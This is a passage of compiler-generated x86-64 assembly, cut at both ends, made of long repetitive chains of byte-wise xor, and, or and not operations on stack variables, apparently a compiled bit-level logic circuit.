%ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -704(%rbp) movzbl -876(%rbp), %eax movzbl -703(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -271(%rbp) movzbl -877(%rbp), %eax movzbl -703(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -903(%rbp) movzbl -927(%rbp), %eax movzbl -905(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -908(%rbp) movzbl -927(%rbp), %eax movzbl -905(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1211(%rbp) movzbl -975(%rbp), %eax movzbl -905(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -589(%rbp) movzbl -156(%rbp), %eax movzbl -264(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1163(%rbp) movzbl -491(%rbp), %eax xorl $-1, %eax movzbl -492(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -588(%rbp) movzbl -1049(%rbp), %eax movzbl -51(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1047(%rbp) movzbl -299(%rbp), %eax movzbl -1052(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1051(%rbp) movzbl -1180(%rbp), %eax movzbl -1186(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1185(%rbp) movzbl -993(%rbp), %eax movzbl -1204(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1203(%rbp) movzbl -456(%rbp), %eax movzbl -457(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -458(%rbp) movzbl -825(%rbp), %eax movzbl -461(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -462(%rbp) movzbl -479(%rbp), %eax movzbl -474(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -473(%rbp) movzbl -806(%rbp), %eax movzbl -478(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -477(%rbp) movzbl -442(%rbp), %eax movzbl -447(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -448(%rbp) movzbl -405(%rbp), %eax movzbl -443(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -444(%rbp) movzbl -787(%rbp), %eax movzbl -781(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -778(%rbp) movzbl -107(%rbp), %eax movzbl -766(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -793(%rbp) movzbl -780(%rbp), %eax movzbl -848(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -541(%rbp) movzbl -631(%rbp), %eax movzbl -1084(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1070(%rbp) movzbl -719(%rbp), %eax movzbl -436(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -804(%rbp) movzbl -527(%rbp), %eax movzbl -714(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -713(%rbp) movzbl -217(%rbp), %eax movzbl -215(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -212(%rbp) movzbl -855(%rbp), %eax movzbl -665(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -223(%rbp) movzbl -699(%rbp), %eax movzbl -700(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -331(%rbp) movzbl -877(%rbp), %eax movzbl -704(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -697(%rbp) movzbl -272(%rbp), %eax movzbl -271(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -278(%rbp) movzbl -975(%rbp), %eax movzbl -908(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -900(%rbp) movzbl -1220(%rbp), %eax movzbl -1211(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1210(%rbp) movzbl -1050(%rbp), %eax xorl $-1, %eax movzbl -1047(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -297(%rbp) movzbl -298(%rbp), %eax movzbl -1051(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1189(%rbp) movzbl -1181(%rbp), %eax xorl $-1, %eax movzbl -1185(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1184(%rbp) movzbl -992(%rbp), %eax movzbl -1203(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -93(%rbp) movzbl -455(%rbp), %eax xorl $-1, %eax movzbl -458(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -96(%rbp) movzbl -826(%rbp), %eax movzbl -462(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1090(%rbp) movzbl -480(%rbp), %eax xorl $-1, %eax movzbl -473(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -476(%rbp) movzbl -957(%rbp), %eax movzbl -477(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -305(%rbp) movzbl -441(%rbp), %eax xorl $-1, %eax movzbl -448(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -445(%rbp) movzbl -404(%rbp), %eax movzbl -444(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -581(%rbp) movzbl -791(%rbp), %eax xorl $-1, %eax movzbl -778(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -566(%rbp) movzbl -106(%rbp), %eax movzbl -793(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -786(%rbp) movzbl -1056(%rbp), %eax xorl $-1, %eax movzbl -541(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -348(%rbp) movzbl -630(%rbp), %eax movzbl -1070(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -659(%rbp) movzbl -720(%rbp), %eax xorl $-1, %eax movzbl -804(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -660(%rbp) movzbl -526(%rbp), %eax movzbl -713(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1036(%rbp) movzbl -220(%rbp), %eax xorl $-1, %eax movzbl -212(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -325(%rbp) movzbl -854(%rbp), %eax movzbl -223(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -745(%rbp) movzbl -698(%rbp), %eax xorl $-1, %eax movzbl -331(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -330(%rbp) movzbl -1222(%rbp), %eax movzbl -697(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -281(%rbp) movzbl -903(%rbp), %eax xorl $-1, %eax movzbl -278(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -277(%rbp) movzbl -976(%rbp), %eax movzbl -900(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1212(%rbp) movzbl -589(%rbp), %eax xorl $-1, %eax movzbl -1210(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1073(%rbp) movzbl -426(%rbp), %eax movzbl -1073(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -468(%rbp) movzbl -427(%rbp), %eax movzbl -1073(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -494(%rbp) movzbl -1051(%rbp), %eax movzbl -297(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -17(%rbp) movzbl -1051(%rbp), %eax movzbl -297(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1187(%rbp) movzbl -298(%rbp), %eax movzbl -297(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1188(%rbp) movzbl -1203(%rbp), %eax movzbl -1184(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1183(%rbp) movzbl -1203(%rbp), %eax movzbl -1184(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -91(%rbp) movzbl -992(%rbp), %eax movzbl -1184(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -92(%rbp) movzbl -462(%rbp), %eax movzbl -96(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -95(%rbp) movzbl -462(%rbp), %eax movzbl -96(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -810(%rbp) movzbl -826(%rbp), %eax movzbl -96(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -809(%rbp) movzbl -477(%rbp), %eax movzbl -476(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -475(%rbp) movzbl -477(%rbp), %eax movzbl -476(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1145(%rbp) movzbl -957(%rbp), %eax movzbl -476(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1146(%rbp) movzbl -444(%rbp), %eax movzbl -445(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -179(%rbp) movzbl -444(%rbp), %eax movzbl -445(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -579(%rbp) movzbl -404(%rbp), %eax movzbl -445(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -578(%rbp) movzbl -793(%rbp), %eax movzbl -566(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -567(%rbp) movzbl -793(%rbp), %eax movzbl -566(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -788(%rbp) movzbl -106(%rbp), %eax movzbl -566(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -873(%rbp) movzbl -1070(%rbp), %eax movzbl -348(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -864(%rbp) movzbl -1070(%rbp), %eax movzbl -348(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -657(%rbp) movzbl -630(%rbp), %eax movzbl -348(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -656(%rbp) movzbl -713(%rbp), %eax movzbl -660(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -661(%rbp) movzbl -713(%rbp), %eax movzbl -660(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1074(%rbp) movzbl -526(%rbp), %eax movzbl -660(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1037(%rbp) movzbl -223(%rbp), %eax movzbl -325(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1176(%rbp) movzbl -223(%rbp), %eax movzbl -325(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -341(%rbp) movzbl -854(%rbp), %eax movzbl -325(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -343(%rbp) movzbl -697(%rbp), %eax movzbl -330(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -345(%rbp) movzbl -697(%rbp), %eax movzbl -330(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -280(%rbp) movzbl -1222(%rbp), %eax movzbl -330(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -282(%rbp) movzbl -900(%rbp), %eax movzbl -277(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -276(%rbp) movzbl -900(%rbp), %eax movzbl -277(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -344(%rbp) movzbl -976(%rbp), %eax movzbl -277(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -435(%rbp) movzbl -426(%rbp), %eax movzbl -1073(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1209(%rbp) movzbl -298(%rbp), %eax movzbl -17(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -596(%rbp) movzbl -472(%rbp), %eax movzbl -468(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -483(%rbp) movzbl -1188(%rbp), %eax movzbl -1187(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -294(%rbp) movzbl -992(%rbp), %eax movzbl -1183(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1190(%rbp) movzbl -92(%rbp), %eax movzbl -91(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -90(%rbp) movzbl -826(%rbp), %eax movzbl -95(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -94(%rbp) movzbl -809(%rbp), %eax movzbl -810(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -807(%rbp) movzbl -957(%rbp), %eax movzbl -475(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1088(%rbp) movzbl -1146(%rbp), %eax movzbl -1145(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -40(%rbp) movzbl -404(%rbp), %eax movzbl -179(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -936(%rbp) movzbl -578(%rbp), %eax movzbl -579(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -576(%rbp) movzbl -106(%rbp), %eax movzbl -567(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -580(%rbp) movzbl -873(%rbp), %eax movzbl -788(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -789(%rbp) movzbl -630(%rbp), %eax movzbl -864(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -785(%rbp) movzbl -656(%rbp), %eax movzbl -657(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -654(%rbp) movzbl -526(%rbp), %eax movzbl -661(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -658(%rbp) movzbl -1037(%rbp), %eax movzbl -1074(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1078(%rbp) movzbl -854(%rbp), %eax movzbl -1176(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1157(%rbp) movzbl -745(%rbp), %eax movzbl -341(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -340(%rbp) movzbl -1222(%rbp), %eax movzbl -345(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -751(%rbp) movzbl -281(%rbp), %eax movzbl -280(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -279(%rbp) movzbl -976(%rbp), %eax movzbl -276(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -275(%rbp) movzbl -1212(%rbp), %eax movzbl -344(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -755(%rbp) movzbl -427(%rbp), %eax movzbl -1209(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1215(%rbp) movzbl -1214(%rbp), %eax movzbl -1215(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1225(%rbp) movzbl -494(%rbp), %eax xorl $-1, %eax movzbl -483(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1227(%rbp) movzbl -1189(%rbp), %eax xorl $-1, %eax movzbl -294(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -295(%rbp) movzbl -994(%rbp), %eax movzbl -1190(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -996(%rbp) movzbl -93(%rbp), %eax xorl $-1, %eax movzbl -90(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -89(%rbp) movzbl -827(%rbp), %eax movzbl -94(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -811(%rbp) movzbl -1090(%rbp), %eax xorl $-1, %eax movzbl -807(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -808(%rbp) movzbl -758(%rbp), %eax movzbl -1088(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -686(%rbp) movzbl -305(%rbp), %eax xorl $-1, %eax movzbl -40(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1143(%rbp) movzbl -415(%rbp), %eax movzbl -936(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -731(%rbp) movzbl -581(%rbp), %eax xorl $-1, %eax movzbl -576(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -577(%rbp) movzbl -109(%rbp), %eax movzbl -580(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -23(%rbp) movzbl -786(%rbp), %eax xorl $-1, %eax movzbl -789(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -22(%rbp) movzbl -629(%rbp), %eax movzbl -785(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -35(%rbp) movzbl -659(%rbp), %eax xorl $-1, %eax movzbl -654(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -655(%rbp) movzbl -521(%rbp), %eax movzbl -658(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1065(%rbp) movzbl -1036(%rbp), %eax xorl $-1, %eax movzbl -1078(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1081(%rbp) movzbl -853(%rbp), %eax movzbl -1157(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -120(%rbp) movzbl -343(%rbp), %eax xorl $-1, %eax movzbl -340(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -339(%rbp) movzbl -1217(%rbp), %eax movzbl -751(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -643(%rbp) movzbl -282(%rbp), %eax xorl $-1, %eax movzbl -279(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -639(%rbp) movzbl -973(%rbp), %eax movzbl -275(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -334(%rbp) movzbl -435(%rbp), %eax xorl $-1, %eax movzbl -755(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -705(%rbp) movzbl -1214(%rbp), %eax movzbl -705(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -258(%rbp) movzbl -1215(%rbp), %eax movzbl -705(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1224(%rbp) movzbl -497(%rbp), %eax movzbl -1227(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -209(%rbp) movzbl -497(%rbp), %eax movzbl -1227(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -741(%rbp) movzbl -493(%rbp), %eax movzbl -1227(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -246(%rbp) movzbl -1190(%rbp), %eax movzbl -295(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -296(%rbp) movzbl -1190(%rbp), %eax movzbl -295(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -990(%rbp) movzbl -994(%rbp), %eax movzbl -295(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -997(%rbp) movzbl -94(%rbp), %eax movzbl -89(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -88(%rbp) movzbl -94(%rbp), %eax movzbl -89(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1173(%rbp) movzbl -827(%rbp), %eax movzbl -89(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -812(%rbp) movzbl -1088(%rbp), %eax movzbl -808(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1072(%rbp) movzbl -1088(%rbp), %eax movzbl -808(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -252(%rbp) movzbl -758(%rbp), %eax movzbl -808(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -680(%rbp) movzbl -936(%rbp), %eax movzbl -1143(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1142(%rbp) movzbl -936(%rbp), %eax movzbl -1143(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -204(%rbp) movzbl -415(%rbp), %eax movzbl -1143(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -11(%rbp) movzbl -580(%rbp), %eax movzbl -577(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -574(%rbp) movzbl -580(%rbp), %eax movzbl -577(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -25(%rbp) movzbl -109(%rbp), %eax movzbl -577(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -959(%rbp) movzbl -785(%rbp), %eax movzbl -22(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -21(%rbp) movzbl -785(%rbp), %eax movzbl -22(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -289(%rbp) movzbl -629(%rbp), %eax movzbl -22(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -571(%rbp) movzbl -658(%rbp), %eax movzbl -655(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -652(%rbp) movzbl -658(%rbp), %eax movzbl -655(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -367(%rbp) movzbl -521(%rbp), %eax movzbl -655(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -257(%rbp) movzbl -1157(%rbp), %eax movzbl -1081(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1082(%rbp) movzbl -1157(%rbp), %eax movzbl -1081(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -121(%rbp) movzbl -853(%rbp), %eax movzbl -1081(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -123(%rbp) movzbl -751(%rbp), %eax movzbl -339(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -338(%rbp) movzbl -751(%rbp), %eax movzbl -339(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -644(%rbp) movzbl -1217(%rbp), %eax movzbl -339(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -642(%rbp) movzbl -275(%rbp), %eax movzbl -639(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -640(%rbp) movzbl -275(%rbp), %eax movzbl -639(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -335(%rbp) movzbl -973(%rbp), %eax movzbl -639(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -333(%rbp) movzbl -1214(%rbp), %eax movzbl -705(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -708(%rbp) movzbl -994(%rbp), %eax movzbl -296(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -273(%rbp) movzbl -1225(%rbp), %eax movzbl -258(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -370(%rbp) movzbl -493(%rbp), %eax movzbl -209(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -210(%rbp) movzbl -742(%rbp), %eax movzbl -741(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1138(%rbp) movzbl -997(%rbp), %eax movzbl -990(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -981(%rbp) movzbl -827(%rbp), %eax movzbl -88(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -87(%rbp) movzbl -812(%rbp), %eax movzbl -1173(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1174(%rbp) movzbl -758(%rbp), %eax movzbl -1072(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1075(%rbp) movzbl -680(%rbp), %eax movzbl -252(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -321(%rbp) movzbl -415(%rbp), %eax movzbl -1142(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1141(%rbp) movzbl -11(%rbp), %eax movzbl -204(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -203(%rbp) movzbl -109(%rbp), %eax movzbl -574(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -575(%rbp) movzbl -959(%rbp), %eax movzbl -25(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -28(%rbp) movzbl -629(%rbp), %eax movzbl -21(%rbp), %ecx xorl %ecx, %eax ## 